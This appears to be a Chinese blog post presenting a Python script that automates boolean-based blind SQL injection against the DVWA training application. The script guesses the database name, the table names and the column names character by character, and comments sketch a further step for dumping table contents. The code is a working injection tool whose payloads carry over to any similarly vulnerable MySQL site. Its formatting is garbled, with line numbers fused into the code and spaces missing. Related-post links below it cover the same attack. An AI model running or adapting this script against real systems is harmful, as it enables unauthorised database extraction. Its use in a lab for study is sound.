python脚本自动化盲注_python dvwa布尔盲注自动化脚本(level=low)
仅供学习代码参考
1#python dvwa布尔盲注自动化脚本
2 importrequests3 importstring4 importtime5 INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id="
6 token={"security":"low","PHPSESSID":"p7g937ga5glcvg8m5hv9o9a2ht"} #登录身份识别
7 COLUMN_NUM=11
8 COLUMN_LEN=15
9 dbLen=010 dbname=''
11 table_num=012 table=[]13 table_name='' #暂存用
14 column=[]15 column_name=''#暂存用
16 rightLen=017
18 time_start=time.time()19 url=INIT_URL+"1&Submit=Submit#"
20 rightLen=len(requests.get(url=url,cookies=token).text)21 print("正常返回文本长度:"+str(rightLen))22 #1.猜解数据库名长度 poc:" 1'and (select length(database()))="+str(dbLen)#"
23 whileTrue:24 dbLen +=1
25 dbUrl=INIT_URL+"1'and (select length(database()))="+str(dbLen)+"%23&Submit=Submit#"
26 print(dbUrl)27 if len(requests.get(url=dbUrl,cookies=token).text)==rightLen:28 print("数据库长度:"+str(dbLen))29 break
30 #2.猜解数据库名字 poc:" 1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1#"
31 for i in range(1,dbLen+1):32 for j instring.ascii_lowercase:33 dbnameUrl=INIT_URL+"1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1%23&Submit=Submit#"
34 print(dbnameUrl)35 if len(requests.get(url=dbnameUrl,cookies=token).text)==rightLen:36 dbname+=j37 break
38
39 print("数据库名字:"+dbname)40
41 #3.猜解数据库表数量 poc:" 1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)#"
42
43 for i in range(100):44 dbUrl=INIT_URL+"1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)+"%23&Submit=Submit#"
45 print(dbUrl)46 if len(requests.get(dbUrl,cookies=token).text)==rightLen:47 print("表数量"+str(i))48 table_num=i49 break
50
51 #4.猜解表名 poc:" 1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1)))=103#
52
53 for i inrange(table_num):54 for k inrange(COLUMN_LEN):55 for j in range(48,123):56 dbUrl=INIT_URL+"1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
57 print(dbUrl)58 if len(requests.get(dbUrl,cookies=token).text)==rightLen:59 table_name+=chr(j)60 print(table_name)61 break
62 table.append(table_name)63 table_name=''
64 print("表名:"+str(table))65
66
67
68 #5.猜解列名 poc :" 1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1)))=i
69
70
71 for m inrange(table_num):72 for i inrange(COLUMN_NUM):73 for k inrange(COLUMN_LEN):74 for j in range(48,123):75 dbUrl=INIT_URL+"1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"'and table_name='"+table[m]+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
76 print(dbUrl)77 if len(requests.get(dbUrl,cookies=token).text)==rightLen:78 column_name+=chr(j)79 print(column_name)80 break
81 column_name+='/'
82 column.append(column_name)83 column_name=''
84 print("列名:"+str(column))85
86 time_end=time.time()87 print('用时:',time_end-time_start,'s')88 print("正常返回文本长度:"+str(rightLen))89 print("数据库长度:"+str(dbLen))90 print("数据库名字:"+dbname)91 print("表数量"+str(i))92 print("表名:"+str(table))93 print("列名:"+str(column))94 #6.拖库 poc: 1'and (select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i
95 #具体列具体猜解,全部猜解时间太高
python脚本自动化盲注_python dvwa布尔盲注自动化脚本(level=low)相关推荐
- python定时运行py文件_Python使用windows设置定时执行脚本
如果你写了一些Python程序,想要在特定的时间进行执行,例如你想让一段爬虫程序在每天的上午10点执行一次,那么我们就可以来使用windows自带的定时任务进行设置.由于Windows系统,无法使用L ...
- python脚本自动qq签到_python实现虾米音乐自动签到脚本
初学python以及编程,尝试写这样一个脚本,待成功后才会继续完善. 现在想要实现登陆. 问题: 请问我这个代码哪儿出了问题?登陆不成功. headers和postData要写哪些出来,我用HttpF ...
- SQL注入之布尔盲注——sql-lab第八关
布尔盲注简介 什么是盲注 盲注其实是sql注入的一种,之所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息. [之前在做联合注入第一关的时候,用union select语句注入 ...
- SQL注入原理-布尔盲注
小伙伴们大家好,今天为大家带来的使SQL注入原理之布尔盲注. 目录 布尔盲注使用的环境 常用函数与语句 substr()函数 ord()函数 length()函数 实战演示 1.判断是否存在注入点 2 ...
- SQL注入——布尔盲注,时间盲注,宽字节注入
布尔盲注 1.布尔盲注利用前提 页面没有显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常来判断是否存在注入 缺点:速度太慢,消耗大量时间 布尔盲注思维导图: 布尔盲注常用语句: su ...
- 以dvwa为例学习简单sql布尔盲注的详细脚本
0x01 前置知识 1.SQL注入与SQL盲注 SQL注入: 执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 S ...
- python实现sql宽字节注入+布尔盲注
目录 一.注意点 二.代码 三.使用 1.获取 (简单方法) (复杂方法) 2.使用 四.测试 一.注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基 ...
- 【SQL注入14】布尔盲注的半自动化实现(基于BurpSuite工具和sqli-labs-less8靶机平台)
目录 1 概述 2 实验简介 2.1 实验平台 2.2 实验目标 3 实验过程 3.1 判断注入点及注入类型 3.2 爆库名(踩坑) 3.3 爆库名(成功) 3.4 爆表名 3.5 爆字段名 3.6 ...
- SQLi LABS Less-8 布尔盲注
「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第八关是单引号字符型注入,推荐使用布尔盲注 方式一:布尔盲注 第一步.判断注入 ...
最新文章
- 2021年速卖通828年中大促活动报名攻略
- Altium designer快捷键汇总
- loadrunner 场景设计-负载生成器管理
- react全局状态管理_react 状态管理的复杂度来源
- dispatch js实现_通信:派发与广播,on与emit,自行实现dispatch和broadcast方法
- dedecms 常用标签
- 图像欧拉数计算 matlab实现
- [poj1222]EXTENDED LIGHTS OUT(高斯消元)
- 七类***各有“黑招”
- 医学DICOM文件解析(笔记整理)
- Android 各国语言缩写及简称详细介绍
- opencore添加Linux引导,黑苹果OpenCore引导详细教程
- 使用NGUI实现拖拽功能(拼图小游戏)
- 墨哥视角,微软大八系,能大发么?(一)——surface
- EasyPlayer播放H.265的HLS视频流出现加载异常的问题分析及解决方法
- mysql数据库误删后能恢复吗_MySQL 数据库误删除后的数据恢复
- HDU 1422 重温世界杯 【C++练习题】
- mysql错误合集_mysql错误合集
- 元数据管理-技术元数据解决方案
- 股票打板 知识 收集